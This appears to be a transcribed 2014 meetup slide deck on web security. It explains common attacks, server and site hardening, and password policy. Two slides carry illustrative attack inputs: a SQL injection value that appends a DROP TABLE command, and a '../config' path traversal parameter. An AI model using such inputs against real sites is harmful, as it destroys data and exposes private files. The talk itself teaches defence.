Modern Web Security

  • View
    2.853

  • Download
    1

  • Category

    Internet

Preview:

DESCRIPTION

Basic security concepts for web applications and web sites for today's environment. Server Configuration, Site Configuration, Best Practices, and Passwords.

Citation preview

Bill Condo / @mavrck

Modern Web SecurityAttacks & Improvements

4/2/2014 | Dayton Web Developers

Bill Condo / @mavrck

Who here is responsible for a website?

Bill Condo / @mavrck

Who here has published code updates live in the last month?

Bill Condo / @mavrck

Are they secure?

Bill Condo / @mavrck

What We’ll Cover

• Common Threats

• Easy Improvements

• Bonus: Passwords

Bill Condo / @mavrck

Common Threats

• Cross Site Scripting

• SQL Injection

• Path Disclosure

• Cross Site Request Forgery

• Information Disclosure

Bill Condo / @mavrck

• Denial of Service

• Code Execution

• Memory Corruption

• Arbitrary File

• Local File Include

• Remote File Include

• Buffer overflow

Bill Condo / @mavrck

Cross-site scripting (XSS)

• In a nutshell, websites that allow external code to sent with a response to a user’s browser.

• Typically this is javascript that is inserted into a query string or form field that is allowed to run.

• Opens up cookie and sensitive data

Bill Condo / @mavrck

SQL Injection

• Allowing user input to directly be inserted into database queries, opening the possibility of unexpected data, and database corruption and data leakage.

• (original) statement = "SELECT * FROM users WHERE id ='" + id + “';"

• (input) 0’; DROP TABLE users

• (final) statement = "SELECT * FROM users WHERE id =‘0'; DROP TABLE users;"

Bill Condo / @mavrck

http://xkcd.com/327/

Bill Condo / @mavrck

Path Disclosure

• Allowing an attacker to see the path to the web root. /home/site.com/public/index.php

• This could allow viewing of private files, and provides a nugget of knowledge that can be combined to allow full access.

• http://site.com/index.php?page=about

• http://site.com/index.php?page=../config

Bill Condo / @mavrck

Cross Site Request Forgery (CSRF)

• Exploits a website’s unauthenticated functionality from an authenticated user. This is commonly from features driven from url parameters that doesn’t have sufficient verification in place.

• http://site.com/send-message.php?from=bill&to=brad&message=hi

• May also be exploited by malicious code injected into a page.

Bill Condo / @mavrck

Information Disclosure

• Releasing secure information to an untrusted environment. This can be operating environment, customer data, or trade secrets.

• Path that the website runs at, database info, service versions, etc.

• Credit card data, private account info (address, phone), and customer history.

• Business logic, processes, and long-term business plans.

Bill Condo / @mavrck

Bill Condo / @mavrck

Bill Condo / @mavrck

Easy Improvements

• Secure Your Environment

• Secure Your Website

• Establish Audits

Bill Condo / @mavrck

Secure your Environment• Leave your cheap web host (BlueHost, GoDaddy, etc) and go to a Virtual

Private Server (VPS) such as Digital Ocean, Linode, Rackspace, AWS, etc. You don’t want to share security concerns with the world.

• Turn of the displaying of errors and debugging info in production, and redirect them to log files.

• Turn on automatic updates for security patches.

• Turn off broadcasting of service versions and extensions.

• Turn off modules that aren’t required.

Bill Condo / @mavrck

Sorry, We’re Not Sharing Security…

Bill Condo / @mavrck

Thanks for letting me know…

Bill Condo / @mavrck

Secure Your Website

• Sanitize user input. Always.

• Escape and sanitize database queries. Better yet, use an established package for prepared statements.

• Store sensitive data outside of the webroot with proper permissions.

• SSL where possible.

• Sandbox user uploads and treat with suspicion.

Bill Condo / @mavrck

Establish Audits

• Black Box: Security/Vulnerability Scanners, Penetration Tests

• White Box: Source Code Analyzers, Code Tests

• Password Testing

Bill Condo / @mavrck

More Security Info

• http://www.webappsec.org

• http://www.owasp.org

Bill Condo / @mavrck

Stretch.Last minute bucket. We’re in overtime.

Bill Condo / @mavrck

Bonus: Password Security

• Terminology

• Landscape/Problems

• Best Practices

• Getting Policy Buy-in

Bill Condo / @mavrck

Password Terminology• Encrypting - The process of encoding messages or information in

such a way that only authorized parties can read it*. Encryption typically involves a private key and can be performed two way.

• Hashing - Password hashing is a one way conversion of an input into a representative string. (i.e. nothing = 4fhk348fhsk48rfk4d3)

• Salting - A unique string of characters (hopefully per user) that helps keep the password hashes different for users that have the same password.

*http://en.wikipedia.org/wiki/Encryption

Bill Condo / @mavrck

• Entropy (Strength) - A measure of the uncertainty associated with a random variable. (i.e. Password Strength)

• Rainbow Tables - Pre-calculated lookup values that match a string with a value for a known encrypted algorithm.

Bill Condo / @mavrck

http://xkcd.com/936/

Bill Condo / @mavrck

Problems

Bill Condo / @mavrck

State of Passwords

• Most people share between sites

• Most people don’t use secure passwords

• Secure passwords, with high entropy are impossible to remember

• Most people don’t use a password manager

Bill Condo / @mavrck

Lack of Transparency

• Web Apps & Sites don’t disclosure their password policies, encryption strength, and their isn’t a standard body to police who’s following best practices and who’s being risky.

• Users often don’t find out what data was compromised from an attack, and frequently don’t find out about an breach at all until it reaches the news cycle.

Bill Condo / @mavrck

Forgotten Trail

• With e-commerce, we often have to create an account, provide payment details, and then may never shop there again. However, the data persists.

• Users typically don’t keep a master list of sites they have an account on, or have purchased from. Each account can act as a nugget of knowledge, slowly building up to enough data for concern.

Bill Condo / @mavrck

Best PracticesWorst Practices

Bill Condo / @mavrck

Don’t help the enemy

• Don’t: Policies that enforce things such as “first character must by upper case” and “must end in a special character”. Allows masking.

• Don’t: To an extent, disclosing the minimum requirements for lower case, upper case, numeric, and special characters.

Bill Condo / @mavrck

Garbage in, garbage out

• Don’t: Having no password policy at all.

• Don’t: Allowing common passwords like ‘password’, ‘123456’.

• Don’t: Allowing common dictionary words.

Bill Condo / @mavrck

Getting Policy Buy-in

Bill Condo / @mavrck

#1 Prevent PR Issues

Bill Condo / @mavrck

#2 Cost vs Risk

• Doing security correctly is less expensive upfront. The opportunity cost is minimal compared the reduction in risk. Cost * Risk = Likelihood Cost

• What does it cost to cleanup the mess: reset the passwords, scan the servers, added support calls/requests, etc…

Bill Condo / @mavrck

#3 Predictability

• Help project/business managers in being able to minimize unexpected security response events.

• Better understand how your week is going to go.

Bill Condo / @mavrck

Bill Condo / @mavrck

My Ask of You

• If you found this information useful, I ask two things of you:

• Follow me Twitter for development tips: @mavrck

• Back the Salt Mines Device Lab fundraiser for $1+: http://igg.me/p/728005

• Also, we’re hiring at LMG. Grab a card if you’re currently not next to your boss (otherwise email bill@lmgresults.com).

Bill Condo / @mavrck

Roaring Applause Here.Thanks for your time.

Recommended